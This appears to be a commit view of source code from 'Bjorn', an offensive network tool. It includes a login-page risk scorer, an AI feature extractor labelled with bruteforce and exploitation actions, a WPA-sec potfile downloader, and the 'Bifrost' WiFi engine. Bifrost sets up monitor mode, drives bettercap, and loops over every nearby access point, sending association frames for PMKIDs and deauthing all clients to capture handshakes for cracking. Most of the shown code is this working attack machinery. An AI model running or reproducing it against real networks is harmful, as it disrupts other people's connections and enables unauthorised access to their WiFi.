https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"count": str(len(rows)),
"top_path": top_path,
"top_score": str(top_score),
"avg_score": str(avg),
}
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

View File

@@ -8,6 +8,7 @@ import argparse
import requests
import subprocess
from datetime import datetime
import logging
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
@@ -172,8 +173,9 @@ class WPAsecPotfileManager:
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
response.raise_for_status()
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
ts = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = os.path.join(save_dir, f"potfile_{ts}.pot")
os.makedirs(save_dir, exist_ok=True)
with open(filename, "wb") as file:

File diff suppressed because it is too large Load Diff

1121
ai_engine.py Normal file

File diff suppressed because it is too large Load Diff

99
ai_utils.py Normal file
View File

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except:
return "00:00:00:00:00:00"

585
bifrost/__init__.py Normal file
View File

@@ -0,0 +1,585 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
import time
import subprocess
import threading
import logging
from logger import Logger
logger = Logger(name="bifrost", level=logging.DEBUG)
class BifrostEngine:
"""Main Bifrost lifecycle manager.
Manages the bettercap subprocess and BifrostAgent daemon loop.
Pattern follows SentinelEngine (sentinel.py).
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._thread = None
self._stop_event = threading.Event()
self._running = False
self._bettercap_proc = None
self._monitor_torn_down = False
self._monitor_failed = False
self.agent = None
@property
def enabled(self):
return bool(self.shared_data.config.get('bifrost_enabled', False))
def start(self):
"""Start the Bifrost engine (bettercap + agent loop)."""
if self._running:
logger.warning("Bifrost already running")
return
# Wait for any previous thread to finish before re-starting
if self._thread and self._thread.is_alive():
logger.warning("Previous Bifrost thread still running — waiting ...")
self._stop_event.set()
self._thread.join(timeout=15)
logger.info("Starting Bifrost engine ...")
self._stop_event.clear()
self._running = True
self._monitor_failed = False
self._monitor_torn_down = False
self._thread = threading.Thread(
target=self._loop, daemon=True, name="BifrostEngine"
)
self._thread.start()
def stop(self):
"""Stop the Bifrost engine gracefully.
Signals the daemon loop to exit, then waits for it to finish.
The loop's finally block handles bettercap shutdown and monitor teardown.
"""
if not self._running:
return
logger.info("Stopping Bifrost engine ...")
self._stop_event.set()
self._running = False
if self._thread and self._thread.is_alive():
self._thread.join(timeout=15)
self._thread = None
self.agent = None
# Safety net: teardown is idempotent, so this is a no-op if
# _loop()'s finally already ran it.
self._stop_bettercap()
self._teardown_monitor_mode()
logger.info("Bifrost engine stopped")
def _loop(self):
"""Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
try:
# Install compatibility shim for pwnagotchi plugins
from bifrost import plugins as bfplugins
from bifrost.compat import install_shim
install_shim(self.shared_data, bfplugins)
# Setup monitor mode on the WiFi interface
self._setup_monitor_mode()
if self._monitor_failed:
logger.error(
"Monitor mode setup failed — Bifrost cannot operate without monitor "
"mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
"https://github.com/seemoo-lab/nexmon — "
"Or use an external USB WiFi adapter with monitor mode support.")
# Teardown first (restores network services) BEFORE switching mode,
# so the orchestrator doesn't start scanning on a dead network.
self._teardown_monitor_mode()
self._running = False
# Now switch mode back to AUTO — the network should be restored.
# We set the flag directly FIRST (bypass setter to avoid re-stopping),
# then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
try:
self.shared_data.config["bifrost_enabled"] = False
self.shared_data.config["manual_mode"] = False
self.shared_data.config["ai_mode"] = False
self.shared_data.manual_mode = False
self.shared_data.ai_mode = False
self.shared_data.invalidate_config_cache()
logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
except Exception:
pass
return
# Start bettercap
self._start_bettercap()
self._stop_event.wait(3) # Give bettercap time to initialize
if self._stop_event.is_set():
return
# Create agent (pass stop_event so its threads exit cleanly)
from bifrost.agent import BifrostAgent
self.agent = BifrostAgent(self.shared_data, stop_event=self._stop_event)
# Load plugins
bfplugins.load(self.shared_data.config)
# Initialize agent
self.agent.start()
logger.info("Bifrost agent started — entering recon cycle")
# Main recon loop (port of do_auto_mode from pwnagotchi)
while not self._stop_event.is_set():
try:
# Full spectrum scan
self.agent.recon()
if self._stop_event.is_set():
break
# Get APs grouped by channel
channels = self.agent.get_access_points_by_channel()
# For each channel
for ch, aps in channels:
if self._stop_event.is_set():
break
self.agent.set_channel(ch)
# For each AP on this channel
for ap in aps:
if self._stop_event.is_set():
break
# Send association frame for PMKID
self.agent.associate(ap)
# Deauth all clients for full handshake
for sta in ap.get('clients', []):
if self._stop_event.is_set():
break
self.agent.deauth(ap, sta)
if not self._stop_event.is_set():
self.agent.next_epoch()
except Exception as e:
if 'wifi.interface not set' in str(e):
logger.error("WiFi interface lost: %s", e)
self._stop_event.wait(60)
if not self._stop_event.is_set():
self.agent.next_epoch()
else:
logger.error("Recon loop error: %s", e)
self._stop_event.wait(5)
except Exception as e:
logger.error("Bifrost engine fatal error: %s", e)
finally:
from bifrost import plugins as bfplugins
bfplugins.shutdown()
self._stop_bettercap()
self._teardown_monitor_mode()
self._running = False
# ── Monitor mode management ─────────────────────────
# ── Nexmon helpers ────────────────────────────────────
@staticmethod
def _has_nexmon():
"""Check if nexmon firmware patches are installed."""
import shutil
if not shutil.which('nexutil'):
return False
# Verify patched firmware via dmesg
try:
r = subprocess.run(
['dmesg'], capture_output=True, text=True, timeout=5)
if 'nexmon' in r.stdout.lower():
return True
except Exception:
pass
# nexutil exists — assume usable even without dmesg confirmation
return True
@staticmethod
def _is_brcmfmac(iface):
"""Check if the interface uses the brcmfmac driver (Broadcom)."""
driver_path = '/sys/class/net/%s/device/driver' % iface
try:
real = os.path.realpath(driver_path)
return 'brcmfmac' in real
except Exception:
return False
def _detect_phy(self, iface):
"""Detect the phy name for a given interface (e.g. 'phy0')."""
try:
r = subprocess.run(
['iw', 'dev', iface, 'info'],
capture_output=True, text=True, timeout=5)
for line in r.stdout.splitlines():
if 'wiphy' in line:
idx = line.strip().split()[-1]
return 'phy%s' % idx
except Exception:
pass
return 'phy0'
def _setup_monitor_mode(self):
"""Put the WiFi interface into monitor mode.
Strategy order:
1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
3. iw — direct fallback for other drivers
"""
self._monitor_torn_down = False
self._nexmon_used = False
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
# If configured iface already ends with 'mon', derive the base name
if iface.endswith('mon'):
base_iface = iface[:-3] # e.g. 'wlan0mon' -> 'wlan0'
else:
base_iface = iface
# Store original interface name for teardown
self._base_iface = base_iface
self._mon_iface = iface
# Check if a monitor interface already exists
if iface != base_iface and self._iface_exists(iface):
logger.info("Monitor interface %s already exists", iface)
return
# ── Strategy 1: Nexmon (Broadcom brcmfmac) ────────────────
if self._is_brcmfmac(base_iface):
logger.info("Broadcom brcmfmac chip detected on %s", base_iface)
if self._has_nexmon():
if self._setup_nexmon(base_iface, cfg):
return
# nexmon setup failed — don't try other strategies, they won't work either
self._monitor_failed = True
return
else:
logger.error(
"Broadcom brcmfmac chip requires nexmon firmware patches for "
"monitor mode. Install nexmon manually using install_nexmon.sh "
"or visit: https://github.com/seemoo-lab/nexmon")
self._monitor_failed = True
return
# ── Strategy 2: airmon-ng (Atheros, Realtek, etc.) ────────
airmon_ok = False
try:
logger.info("Killing interfering processes ...")
subprocess.run(
['airmon-ng', 'check', 'kill'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Starting monitor mode: airmon-ng start %s", base_iface)
result = subprocess.run(
['airmon-ng', 'start', base_iface],
capture_output=True, text=True, timeout=30,
)
combined = (result.stdout + result.stderr).strip()
logger.info("airmon-ng output: %s", combined)
if 'Operation not supported' in combined or 'command failed' in combined:
logger.warning("airmon-ng failed: %s", combined)
else:
# airmon-ng may rename the interface (wlan0 -> wlan0mon)
if self._iface_exists(iface):
logger.info("Monitor mode active: %s", iface)
airmon_ok = True
elif self._iface_exists(base_iface):
logger.info("Interface %s is now in monitor mode (no rename)", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
airmon_ok = True
if airmon_ok:
return
except FileNotFoundError:
logger.warning("airmon-ng not found, trying iw fallback ...")
except Exception as e:
logger.warning("airmon-ng failed: %s, trying iw fallback ...", e)
# ── Strategy 3: iw (direct fallback) ──────────────────────
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
result = subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
err = result.stderr.strip()
logger.error("iw set monitor failed (rc=%d): %s", result.returncode, err)
self._monitor_failed = True
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
return
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Monitor mode set via iw on %s", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
except Exception as e:
logger.error("Failed to set monitor mode: %s", e)
self._monitor_failed = True
def _setup_nexmon(self, base_iface, cfg):
"""Enable monitor mode using nexmon (for Broadcom brcmfmac chips).
Creates a separate monitor interface (mon0) so wlan0 can potentially
remain usable for management traffic (like pwnagotchi does).
Returns True on success, False on failure.
"""
mon_iface = 'mon0'
phy = self._detect_phy(base_iface)
logger.info("Nexmon: setting up monitor mode on %s (phy=%s)", base_iface, phy)
try:
# Kill interfering services (same as pwnagotchi)
for svc in ('wpa_supplicant', 'NetworkManager', 'dhcpcd'):
subprocess.run(
['systemctl', 'stop', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Remove old mon0 if it exists
if self._iface_exists(mon_iface):
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
# Create monitor interface via iw phy
result = subprocess.run(
['iw', 'phy', phy, 'interface', 'add', mon_iface, 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.error("Failed to create %s: %s", mon_iface, result.stderr.strip())
return False
# Bring monitor interface up
subprocess.run(
['ifconfig', mon_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Enable monitor mode with radiotap headers via nexutil
result = subprocess.run(
['nexutil', '-m2'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.warning("nexutil -m2 returned rc=%d: %s", result.returncode, result.stderr.strip())
# Verify
verify = subprocess.run(
['nexutil', '-m'],
capture_output=True, text=True, timeout=5,
)
mode_val = verify.stdout.strip()
logger.info("nexutil -m reports: %s", mode_val)
if not self._iface_exists(mon_iface):
logger.error("Monitor interface %s not created", mon_iface)
return False
# Success — update config to use mon0
cfg['bifrost_iface'] = mon_iface
self._mon_iface = mon_iface
self._nexmon_used = True
logger.info("Nexmon monitor mode active on %s (phy=%s)", mon_iface, phy)
return True
except FileNotFoundError as e:
logger.error("Required tool not found: %s", e)
return False
except Exception as e:
logger.error("Nexmon setup error: %s", e)
return False
def _teardown_monitor_mode(self):
"""Restore the WiFi interface to managed mode (idempotent)."""
if self._monitor_torn_down:
return
base_iface = getattr(self, '_base_iface', None)
mon_iface = getattr(self, '_mon_iface', None)
if not base_iface:
return
self._monitor_torn_down = True
logger.info("Restoring managed mode for %s ...", base_iface)
if getattr(self, '_nexmon_used', False):
# ── Nexmon teardown ──
try:
subprocess.run(
['nexutil', '-m0'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Nexmon monitor mode disabled (nexutil -m0)")
except Exception:
pass
# Remove the mon0 interface
if mon_iface and mon_iface != base_iface and self._iface_exists(mon_iface):
try:
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Removed monitor interface %s", mon_iface)
except Exception:
pass
else:
# ── airmon-ng / iw teardown ──
try:
iface_to_stop = mon_iface or base_iface
subprocess.run(
['airmon-ng', 'stop', iface_to_stop],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Monitor mode stopped via airmon-ng")
except FileNotFoundError:
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'managed'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Managed mode restored via iw on %s", base_iface)
except Exception as e:
logger.error("Failed to restore managed mode: %s", e)
except Exception as e:
logger.warning("airmon-ng stop failed: %s", e)
# Restart network services that were killed
restarted = False
for svc in ('wpa_supplicant', 'dhcpcd', 'NetworkManager'):
try:
subprocess.run(
['systemctl', 'start', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=15,
)
restarted = True
except Exception:
pass
# Wait for network services to actually reconnect before handing
# control back so the orchestrator doesn't scan a dead interface.
if restarted:
logger.info("Waiting for network services to reconnect ...")
time.sleep(5)
@staticmethod
def _iface_exists(iface_name):
"""Check if a network interface exists."""
return os.path.isdir('/sys/class/net/%s' % iface_name)
# ── Bettercap subprocess management ────────────────
def _start_bettercap(self):
"""Spawn bettercap subprocess with REST API."""
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
host = cfg.get('bifrost_bettercap_host', '127.0.0.1')
port = str(cfg.get('bifrost_bettercap_port', 8081))
user = cfg.get('bifrost_bettercap_user', 'user')
password = cfg.get('bifrost_bettercap_pass', 'pass')
cmd = [
'bettercap', '-iface', iface, '-no-colors',
'-eval', 'set api.rest.address %s' % host,
'-eval', 'set api.rest.port %s' % port,
'-eval', 'set api.rest.username %s' % user,
'-eval', 'set api.rest.password %s' % password,
'-eval', 'api.rest on',
]
logger.info("Starting bettercap: %s", ' '.join(cmd))
try:
self._bettercap_proc = subprocess.Popen(
cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
logger.info("bettercap PID: %d", self._bettercap_proc.pid)
except FileNotFoundError:
logger.error("bettercap not found! Install with: apt install bettercap")
raise
except Exception as e:
logger.error("Failed to start bettercap: %s", e)
raise
def _stop_bettercap(self):
"""Kill the bettercap subprocess."""
if self._bettercap_proc:
try:
self._bettercap_proc.terminate()
self._bettercap_proc.wait(timeout=5)
except subprocess.TimeoutExpired:
self._bettercap_proc.kill()
except Exception:
pass
self._bettercap_proc = None
logger.info("bettercap stopped")
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return full engine status for web API."""
base = {
'enabled': self.enabled,
'running': self._running,
'monitor_failed': self._monitor_failed,
}
if self.agent and self._running:
base.update(self.agent.get_status())
else:
base.update({
'mood': 'sleeping',
'face': '(-.-) zzZ',
'voice': '',
'channel': 0,
'num_aps': 0,
'num_handshakes': 0,
'uptime': 0,
'epoch': 0,
'mode': 'auto',
'last_pwnd': '',
'reward': 0,
})
return base

568
bifrost/agent.py Normal file
View File

@@ -0,0 +1,568 @@
"""
Bifrost — WiFi recon agent.
Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
import json
import os
import re
import asyncio
import threading
import logging
from bifrost.bettercap import BettercapClient
from bifrost.automata import BifrostAutomata
from bifrost.epoch import BifrostEpoch
from bifrost.voice import BifrostVoice
from bifrost import plugins
from logger import Logger
logger = Logger(name="bifrost.agent", level=logging.DEBUG)
class BifrostAgent:
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
def __init__(self, shared_data, stop_event=None):
self.shared_data = shared_data
self._config = shared_data.config
self.db = shared_data.db
self._stop_event = stop_event or threading.Event()
# Sub-systems
cfg = self._config
self.bettercap = BettercapClient(
hostname=cfg.get('bifrost_bettercap_host', '127.0.0.1'),
scheme='http',
port=int(cfg.get('bifrost_bettercap_port', 8081)),
username=cfg.get('bifrost_bettercap_user', 'user'),
password=cfg.get('bifrost_bettercap_pass', 'pass'),
)
self.automata = BifrostAutomata(cfg)
self.epoch = BifrostEpoch(cfg)
self.voice = BifrostVoice()
self._started_at = time.time()
self._filter = None
flt = cfg.get('bifrost_filter', '')
if flt:
try:
self._filter = re.compile(flt)
except re.error:
logger.warning("Invalid bifrost_filter regex: %s", flt)
self._current_channel = 0
self._tot_aps = 0
self._aps_on_channel = 0
self._supported_channels = list(range(1, 15))
self._access_points = []
self._last_pwnd = None
self._history = {}
self._handshakes = {}
self.mode = 'auto'
# Whitelist
self._whitelist = [
w.strip().lower() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
]
# Channels
self._channels = [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
]
# Ensure handshakes dir
hs_dir = cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
if hs_dir and not os.path.exists(hs_dir):
try:
os.makedirs(hs_dir, exist_ok=True)
except OSError:
pass
# ── Lifecycle ─────────────────────────────────────────
def start(self):
"""Initialize bettercap, start monitor mode, begin event polling."""
self._wait_bettercap()
self.setup_events()
self.automata.set_starting()
self._log_activity('system', 'Bifrost starting', self.voice.on_starting())
self.start_monitor_mode()
self.start_event_polling()
self.start_session_fetcher()
self.next_epoch()
self.automata.set_ready()
self._log_activity('system', 'Bifrost ready', self.voice.on_ready())
def setup_events(self):
"""Silence noisy bettercap events."""
logger.info("connecting to %s ...", self.bettercap.url)
silence = [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
]
for tag in silence:
try:
self.bettercap.run('events.ignore %s' % tag, verbose_errors=False)
except Exception:
pass
def _reset_wifi_settings(self):
iface = self._config.get('bifrost_iface', 'wlan0mon')
self.bettercap.run('set wifi.interface %s' % iface)
self.bettercap.run('set wifi.ap.ttl %d' % self._config.get('bifrost_personality_ap_ttl', 120))
self.bettercap.run('set wifi.sta.ttl %d' % self._config.get('bifrost_personality_sta_ttl', 300))
self.bettercap.run('set wifi.rssi.min %d' % self._config.get('bifrost_personality_min_rssi', -200))
hs_dir = self._config.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
self.bettercap.run('set wifi.handshakes.file %s' % hs_dir)
self.bettercap.run('set wifi.handshakes.aggregate false')
def start_monitor_mode(self):
"""Wait for monitor interface and start wifi.recon."""
iface = self._config.get('bifrost_iface', 'wlan0mon')
has_mon = False
retries = 0
while not has_mon and retries < 30 and not self._stop_event.is_set():
try:
s = self.bettercap.session()
for i in s.get('interfaces', []):
if i['name'] == iface:
logger.info("found monitor interface: %s", i['name'])
has_mon = True
break
except Exception:
pass
if not has_mon:
logger.info("waiting for monitor interface %s ... (%d)", iface, retries)
self._stop_event.wait(2)
retries += 1
if not has_mon:
logger.warning("monitor interface %s not found after %d retries", iface, retries)
# Detect supported channels
try:
from bifrost.compat import _build_utils_shim
self._supported_channels = _build_utils_shim(self.shared_data).iface_channels(iface)
except Exception:
self._supported_channels = list(range(1, 15))
logger.info("supported channels: %s", self._supported_channels)
self._reset_wifi_settings()
# Start wifi recon
try:
wifi_running = self._is_module_running('wifi')
if wifi_running:
self.bettercap.run('wifi.recon off; wifi.recon on')
self.bettercap.run('wifi.clear')
else:
self.bettercap.run('wifi.recon on')
except Exception as e:
err_msg = str(e)
if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
logger.error(
"wifi.recon failed: %s — Your WiFi chip likely does NOT support "
"monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
"has limited monitor mode support. Use an external USB WiFi adapter "
"(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
"packet injection.", e)
self._log_activity('error',
'WiFi chip does not support monitor mode',
'Use an external USB WiFi adapter with monitor mode support')
else:
logger.error("Error starting wifi.recon: %s", e)
def _wait_bettercap(self):
retries = 0
while retries < 30 and not self._stop_event.is_set():
try:
self.bettercap.session()
return
except Exception:
logger.info("waiting for bettercap API ...")
self._stop_event.wait(2)
retries += 1
if not self._stop_event.is_set():
raise Exception("bettercap API not available after 60s")
def _is_module_running(self, module):
try:
s = self.bettercap.session()
for m in s.get('modules', []):
if m['name'] == module:
return m['running']
except Exception:
pass
return False
# ── Recon cycle ───────────────────────────────────────
def recon(self):
"""Full-spectrum WiFi scan for recon_time seconds."""
recon_time = self._config.get('bifrost_personality_recon_time', 30)
max_inactive = 3
recon_mul = 2
if self.epoch.inactive_for >= max_inactive:
recon_time *= recon_mul
self._current_channel = 0
if not self._channels:
logger.debug("RECON %ds (all channels)", recon_time)
try:
self.bettercap.run('wifi.recon.channel clear')
except Exception:
pass
else:
ch_str = ','.join(map(str, self._channels))
logger.debug("RECON %ds on channels %s", recon_time, ch_str)
try:
self.bettercap.run('wifi.recon.channel %s' % ch_str)
